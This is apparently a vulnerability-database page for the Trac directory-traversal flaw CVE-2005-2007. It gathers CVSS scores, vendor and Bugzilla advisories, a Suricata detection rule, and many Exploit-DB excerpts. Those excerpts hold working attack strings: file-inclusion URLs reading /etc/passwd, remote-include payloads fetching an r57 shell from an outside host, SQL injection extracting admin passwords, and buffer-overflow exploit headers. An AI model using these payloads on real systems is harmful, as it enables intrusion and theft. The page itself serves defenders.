CVE-2005-2007
Published: 2005-06-19
Priority P4 · 26 · medium 6.4 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
EPSS: 1.79% (75.6th percentile)
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
Affected (13 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | trac | < trac 0.8.4-1 (sid) | trac 0.8.4-1 (sid) |
| edgewall_software | trac | — | — |
| edgewall_software | trac | >= 0 < 0.8.4-1 | 0.8.4-1 |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.4 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:P/A:N |
| osv | — | 6.4 | MEDIUM | — |
| vendor_redhat | — | 9.3 | CRITICAL | — |
| vendor_debian | — | 6.4 | MEDIUM | — |
Red Hat · vendor_redhat · 2007-06-22 · CVSS 2.1
CVE-2007-0773 [LOW] lost fput in a 32-bit ioctl on 64-bit x86 systems
The Linux kernel before 2.6.9-42.0.8 in Red Hat 4.4 allows local users to cause a denial of service (kernel OOPS from null dereference) via fput in a 32-bit ioctl on 64-bit x86 systems, an incomplete fix of CVE-2005-3044.1.
Red Hat · vendor_redhat · 2005-12-19 · CVSS 7.8
CVE-2005-4348 [HIGH] security flaw
fetchmail before 6.3.1 and before 6.2.5.5, when configured for multidrop mode, allows remote attackers to cause a denial of service (application crash) by sending messages without headers from upstream mail servers.
Statement: The Red Hat Security Response Team has rated this issue as having low security impact. An update is available for Red Hat Enterprise Linux 4 to correct this issue:
http://rhn.redhat.com/errata/RHSA-2007-0018.html
This issue did not affect Red Hat Enterprise Linux 2.1 and 3.
Red Hat · vendor_redhat · 2005-08-02 · CVSS 1.2
CVE-2005-2475 [LOW] security flaw
Race condition in Unzip 5.52 allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by Unzip after the decompression is complete.
Statement: This issue was addressed in unzip packages as shipped with Red Hat Enterprise Linux 3 and 4 via RHBA-2007:0418 and RHSA-2007:0203 respectively.
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Debian · vendor_debian · 2005 · CVSS 6.4
CVE-2005-2007 [MEDIUM] trac - Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remo...
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
Scope: local
sid: resolved (fixed in 0.8.4-1)
trixie: resolved (fixed in 0.8.4-1)
Red Hat · vendor_redhat · CVSS 9.3
CVE-2007-3635 [CRITICAL] Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2
Multiple unspecified vulnerabilities in the G/PGP (GPG) Plugin before 2.1 for Squirrelmail might allow "local authenticated users" to inject certain commands via unspecified vectors. NOTE: this might overlap CVE-2005-1924, CVE-2006-4169, or CVE-2007-3634.
Statement: Not vulnerable. This plugin is not shipped with Squirrelmail in Red Hat Enterprise Linux.
Red Hat · vendor_redhat · CVSS 4.3
CVE-2007-1287 [MEDIUM] A regression error in the phpinfo function in PHP 4
A regression error in the phpinfo function in PHP 4.4.3 to 4.4.6, and PHP 6.0 in CVS, allows remote attackers to conduct cross-site scripting (XSS) attacks via GET, POST, or COOKIE array values, which are not escaped in the phpinfo output, as originally fixed for CVE-2005-3388.
Statement: The phpinfo function should not be used in publicly accessible PHP scripts.
Red Hat · vendor_redhat · CVSS 6.9
CVE-2005-4790 [MEDIUM] tomboy and blam uses insecure LD_LIBRARY_PATH
Multiple untrusted search path vulnerabilities in SUSE Linux 9.3 and 10.0, and possibly other distributions, cause the working directory to be added to LD_LIBRARY_PATH, which might allow local users to execute arbitrary code via (1) beagle, (2) tomboy, or (3) blam. NOTE: in August 2007, the tomboy vector was reported for other distributions.
Red Hat · vendor_redhat · CVSS 5.8
CVE-2007-3008 [MEDIUM] Mbedthis AppWeb before 2
Mbedthis AppWeb before 2.2.2 enables the HTTP TRACE method, which has unspecified impact probably related to remote information leaks and cross-site tracing (XST) attacks, a related issue to CVE-2004-2320 and CVE-2005-3398.
Statement: The Apache Software Foundation does not treat this as a security issue. A configuration change can be made to disable the ability to respond to HTTP TRACE requests if required.
For more information please see:
http://www.apacheweek.com/issues/03-01-24#news
GHSA · ghsa_unreviewed · 2022-05-01
CVE-2005-2007 [MEDIUM] GHSA-p2r2-593v-fg6q: Directory traversal vulnerability in Edgewall Trac 0
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
OSV · osv · 2005-06-19 · CVSS 6.4
CVE-2005-2007 [MEDIUM] Directory traversal vulnerability in Edgewall Trac 0
Directory traversal vulnerability in Edgewall Trac 0.8.3 and earlier allows remote attackers to read or write arbitrary files via a .. (dot dot) in the id parameter to the (1) upload or (2) attachment scripts.
Suricata · suricata · 2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB · exploitdb · 2007-12-25
CVE-2007-6543 eSyndiCat Link Exchange Script 2005-2006 - SQL Injection
---
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off
[-] Vulnerable code in /suggest-link.php :
30. /** gets information about current category **/
31. $category =& $gDirDb->getCategoryById($_GET['id']);
32. $gDirSmarty->assign_by_ref('category', $category);
[-] getCategoryById function defined in /classes/Dir.php :
323. function getCategoryById($aCategory)
325. {
326. $sql = "SELECT * FROM `{$this->mPrefix}categories` ";
327. $sql .= "WHERE `id` = '{$aCategory}'";
328.
329. return $this->mDb->getRow($sql);
330.
Exploit-DB · exploitdb · 2007-11-02
CVE-2007-5826 EDraw Flowchart ActiveX Control 2.0 - Insecure Method
---
EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
url: http://www.anydraw.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
MsgBox("Exploit completed!")
End Sub
# milw0rm.com [2007-11-02]
Exploit-DB · exploitdb · 2007-06-28
CVE-2007-3535 GL-SH Deaf Forum 6.4.4 - Local File Inclusion
---
###GL-SH Deaf Board Version <= 6.4.4 local file inclusion###
#download: http://www.frank-karau.de/download/Deafforum_version_6.4.3.zip
#found by: Katatafish ([email protected])
#google dork:"2005 www.frank-karau.de" | "2006 www.frank-karau.de"
#exploit:
http://www.site.com/[path]/functions.php?FORUM_LANGUAGE=../../../../../../../../../../../etc/passwd
http://www.site.com/[path]/bottom.php?style=../../../../../../.././etc/passwd%00
# milw0rm.com [2007-06-28]
Exploit-DB · exploitdb · 2007-05-14
CVE-2007-2710 NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion
---
#NagiosQL Remote file inclusion
#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz
#Thanks str0ke
#Exploit :
#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-14]
Exploit-DB · exploitdb · 2007-05-08
CVE-2007-2611 CGX 20050314 - 'pathCGX' Remote File Inclusion
---
# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerabilities
# D.Script: http://codigolivre.org.br/frs/?group_id=413&release_id=1978
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/
# Greetz To: Tryag-Team ...$$
# milw0rm.com [2007-05-08]
Exploit-DB · exploitdb · 2007-04-29
CVE-2007-2424 The Merchant 2.2.0 - 'index.php?show' Remote File Inclusion
---
2005-2006 The Merchant Project Remote File Include Exploit
//'===============================================================================================
//'[Script Name: 2005-2006 The Merchant Project
//'[Coded by : kezzap66345
//'[Author : kezzap66345
//'[Contact : [email protected]
//'[S.Page : http://www.the-merchant.co.uk/
//'[$$ : Free
//'[Dork : http://www.google.com.tr/search?q=%22The+Merchant+Project%22&hl=tr&start=30&sa=N
//'[Download : http://sourceforge.net/project/downloading.php?group_id=37721&use_mirror=belnet&filename=themerchant-2.2.tar.bz2&58090119
//'===============================================================================================
//Basic exploit,but any time : (
var path="/hel
Exploit-DB · exploitdb · 2007-04-10
CVE-2007-2005 Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion
---
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
Found By : Cold z3ro , [email protected]
Homepage: www.Hack-Teach.com
Script Site : http://taskhopper.com/One1
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/componen
Exploit-DB · exploitdb · 2007-04-01
CVE-2005-1255 IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EI
Exploit-DB · exploitdb · 2007-03-28
CVE-2005-2246 iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion
---
# iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability
# D.Script: http://sourceforge.net/projects/iphotoalbum/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code
#
# Exploit:[Path]/lib/static/header.php?set_menu=SheLL
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx: w4ck1ng.com & h4cky0u.org & t0pP8uZz
# milw0rm.com [2007-03-28]
Exploit-DB · exploitdb · 2007-03-23
CVE-2005-2062 ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection
---
#Title : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8
#Vuln.
#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins
#Admin Login : /admin.asp
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]
Exploit-DB · exploitdb · 2007-03-21
CVE-2007-1579 Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for the stack overflow vulnerability in Mercur Messaging 2005
# SP3 IMAP service. The exploit was tested on windows 2000 server SP4 in a
# Vmware environment. At the time of overflow EBX points to our shellcode.
# However this buffer into which EBX points will give a maximum of 224 bytes of
# uninterrupted space for shellcode. So for my analysis is settled for a useradd
# shellcode which comes to 224 bytes :-). However looking at it a little bit
# further i found that you can send SUBSCRIBE request just before the actual
# command that causes the overflow and you have a shellcode space of 520 bytes
# further down the stack. So you can club the 224 bytes you get at overflow t
Exploit-DB · exploitdb · 2007-02-26
CVE-2005-4832 Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)
---
#!/usr/bin/perl
#
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/396133
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revo
Exploit-DB · exploitdb · 2007-02-23
CVE-2005-4832 Oracle 9i/10g - ACTIVATE_SUBSCRIPTION SQL Injection
---
#!/usr/bin/perl
#
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.securityfocus.com/archive/1/396133
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Feb 23 12:44:18 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl dbms_cdc_subscribe.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at
Exploit-DB · exploitdb · 2007-02-15
CVE-2005-2157 nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion
---
By Cr@zy_King
[email protected]
Thanks : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim
Script : nabopoll 1.x
Risk : Remote File Include | High
Site : http://nabocorp.com/
Google Dork : inurl:"nabopoll/"
Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");
Files: survey.inc.php
Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?
Ayyildiz.Org Present
# milw0rm.com [2007-02-15]
Exploit-DB · exploitdb · 2007-01-29
CVE-2007-0686 Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption
---
/*
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)
This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silv
Exploit-DB · exploitdb · 2005-09-20
CVE-2007-1373 Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
---
/*
Mercury imap4 server remote buffer overflow exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
package : Mercury mail transport system 4.01a and prolly prior
workaround : upgrade to 4.01b version
advisory : not available right now
company address : www.pmail.com
timeline :
15 Sep 2005 : vulnerability reported by securiteam mailing list
20 Sep 2005 : IHS exploit released
exploit features :
1) 5 working targets including win2k , winxp , win2k3
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars are : 0x20 0x0a
compiled with visual c++ 6 : cl mercury_imap.c
greeting to :
www.ihsteam.com the team , LorD and NT heya
www.ihsteam.net english version ,
www.exploitdev.com Jamie and Ben the two
Bugzilla · bugzilla · 2018-08-16 · CVSS 1.2
CVE-2005-2475 [LOW] security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Race condition in Unzip 5.52 allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by Unzip after the decompression is complete.
---
Statement:
This issue was addressed in unzip packages as shipped with Red Hat Enterprise Linux 3 and 4 via RHBA-2007:0418 and RHSA-2007:0203 respectively.
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Bugzilla · bugzilla · 2018-08-16 · CVSS 7.8
CVE-2005-4348 [HIGH] security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
fetchmail before 6.3.1 and before 6.2.5.5, when configured for multidrop mode, allows remote attackers to cause a denial of service (application crash) by sending messages without headers from upstream mail servers.
---
Statement:
The Red Hat Security Response Team has rated this issue as having low security impact. An update is available for Red Hat Enterprise Linux 4 to correct this issue:
http://rhn.redhat.com/errata/RHSA-2007-0018.html
This issue did not affect Red Hat Enterprise Linux 2.1 and 3.
Bugzilla · bugzilla · 2007-11-14 · CVSS 4.3
CVE-2005-4872 [MEDIUM] pcre incorrect memory requirement computation
CVE-2006-7224 initially described several integer overflows in pcre, all
described here:
http://scary.beasts.org/security/CESA-2007-006.html
This id should be used to describe issue #2
in that advisory:
2) Uncharacterized crash researching item #1 above: Demo:
(?P)(?P)...fill in this sequence...(?P)
This does not trigger the integer overflow present in #1 above, but still
crashes with a serious-looking memory error of some kind - possibly a buffer
overflow.
Discussion:
Reference in PCRE changelog for version 6.2:
5. Named capturing subpatterns were not being correctly counted when a pattern
was compiled. This caused two problems: (a) If there were more than 100
such subpatterns, the calculation of the memory needed for the
Bugzilla · bugzilla · 2007-11-05 · CVSS 4.3
CVE-2007-5794 [MEDIUM] nss_ldap randomly replying with wrong user's data
+++ This bug was initially created as a clone of Bug #154314 +++
Description of problem:
Second time already when I hear nss_ldap is replying with wrong results and
causing peoples' mails to be shown to wrong people:
http://www.dovecot.org/list/dovecot/2005-March/006345.html
http://www.dovecot.org/list/dovecot/2005-April/006859.html
Something should really be done about this. At the very least I'm adding a check
to make sure getpwnam() returns the same user name that is being requested, and
if not put out some huge warnings about something being broken..
-- Additional comment from [email protected] on 2007-02-06 11:08 EST --
Oh yeah, got it.
The problem relies in the fact that if an application is linked against
pthre
Bugzilla · bugzilla · 2007-07-13 · CVSS 5.1
CVE-2007-3387 [MEDIUM] xpdf integer overflow
Maurycy Prodeus discovered an integer overflow flaw in the way xpdf processes
PDF files. It's possible this flaw could be used to execute arbitrary code as
the user running the application using the xpdf source.
Discussion:
Created attachment 159239
Proposed upstream fix
---
embargo moved by upstream to Jul 28
---
krh, these packages are affected (I verified them) because of the patch we
applied to fix CVE-2005-3193.
---
These issues should now be considered public.
---
KDE Security Advisory with patches for koffice and kdegraphics:
http://www.kde.org/info/security/advisory-20070730-1.txt
---
poppler-0.5.4-8.fc7 has been submitted as an update for Fedora 7
---
poppler-0.5.4-8.fc7 has been pushed to the Fedora 7 stable repository. If probl
Bugzilla · bugzilla · 2007-05-09 · CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla · bugzilla · 2007-04-30 · CVSS 4.3
CVE-2005-2090 [MEDIUM] multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835 CVE-2005-3510 CVE-2005-4838)
A number of flaws affect the version of Tomcat5 shipped with RHAPS-EL3 (last
updated in RHSA-2006:0592 to 5.0.28). Please see linked bugs for details.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0340.html
Bugzilla · bugzilla · 2007-04-19 · CVSS 4.3
CVE-2005-2090 [MEDIUM] multiple tomcat issues (CVE-2007-0450 CVE-2006-7195 CVE-2006-7196 CVE-2007-1858 CVE-2006-3835)
A number of flaws affect the version of Tomcat5 shipped with RHAPS2 (last
updated in RHSA-2006:0161 to 5.5.12). Please see linked bugs for details.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0326.html
Bugzilla · bugzilla · 2007-04-19 · CVSS 4.3
CVE-2005-2090 [MEDIUM] multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
A number of flaws affect the version of Tomcat5 shipped with RHDS3. Please see
linked bugs for details.
Discussion:
Run manually:
http://yakko.test.redhat.com/run.php?runid=14719
http://yakko.test.redhat.com/run.php?runid=14720
---
Thanks Mark.
Vivek, Can you check those test runs and sign off on the changes as required.
Thanks.
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0328.html
Bugzilla · bugzilla · 2007-04-19 · CVSS 4.3
CVE-2005-2090 [MEDIUM] multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
A number of flaws affect the version of Tomcat5 shipped with RHEL5. Please see
linked bugs for details.
Discussion:
The fix had already been merged to the RHEL-5 branch and tagged. The
corresponding backports were made to the 5.0.z branch and shipped as part of
http://rhn.redhat.com/errata/RHSA-2007-0327.html.
Bugzilla · bugzilla · 2007-04-19 · CVSS 4.3
CVE-2005-2090 [MEDIUM] multiple tomcat issues (CVE-2007-0450 CVE-2006-7195)
+++ This bug was initially created as a clone of Bug #237088 +++ for EUS
A number of flaws affect the version of Tomcat5 shipped with RHEL5. Please see
linked bugs for details.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0327.html
Bugzilla · bugzilla · 2007-02-16 · CVSS 7.8
CVE-2007-0772 [HIGH] NFSACLv2 ACCESS remote DoS
The knfsd code handling the NFSACLv2 ACCESS call has a bogus release handler
defined for it. Anything that sends a proper NFSACLv2 ACCESS call over the wire
to a NFSACLv2-aware NFS server can cause downstream release-ing code to chomp on
the wrong hunk of memory and potentially lead to a panic. It's not clear that
this code path has been tested much, and the problem has been in Linux kernels
since June 2005:
http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=a257cdd0e2179630d3201c32ba14d7fcb3c3a055
It was discovered at Connectathon 2007, largely thanks to much detective work by
Greg Banks at SGI.
Some workarounds are to either disable NFSv2 entirely, or disable ACLs entirely
(CONFIG_NFSD_V2_ACL=n -and- CONFIG_NFSD_V3
Bugzilla · bugzilla · 2007-02-01 · CVSS 1.2
CVE-2005-2475 [LOW] TOCTOU issue in unzip
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHBA-2007-0418.html
Bugzilla · bugzilla · 2006-03-24 · CVSS 3.7
CVE-2005-4667 [LOW] unzip long filename buffer overflow
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHBA-2007-0418.html
Discussion:
Call which can be closed. Errata RHBA-2007:0418-2 delivers
unzip-5.50-35.EL3.i386.rpm
Internal Status set to 'Resolved'
Status set to: Closed by Client
This event sent from IssueTracker by yves.begrand
issue 88545
Bugzilla · bugzilla · 2005-04-17 · CVSS 4.3
CVE-2007-5794 [MEDIUM] nss_ldap randomly replying with wrong user's data [rhel-4.7]
+++ This bug was initially created as a clone of Bug #154314 +++
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6)
Gecko/20050225 Firefox/1.0.1
Description of problem:
Second time already when I hear nss_ldap is replying with wrong results and
causing peoples' mails to be shown to wrong people:
http://www.dovecot.org/list/dovecot/2005-March/006345.html
http://www.dovecot.org/list/dovecot/2005-April/006859.html
Something should really be done about this. At the very least I'm adding a check
to make sure getpwnam() returns the same user name that is being requested, and
if not put out some huge warnings about something being broken..
Version-Release number of sele
References:
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034618.html
- http://secunia.com/advisories/15752
- http://svn.edgewall.com/repos/trac/tags/trac-0.8.4/ChangeLog
- http://www.hardened-php.net/advisory-012005.php

Published: 2005-06-19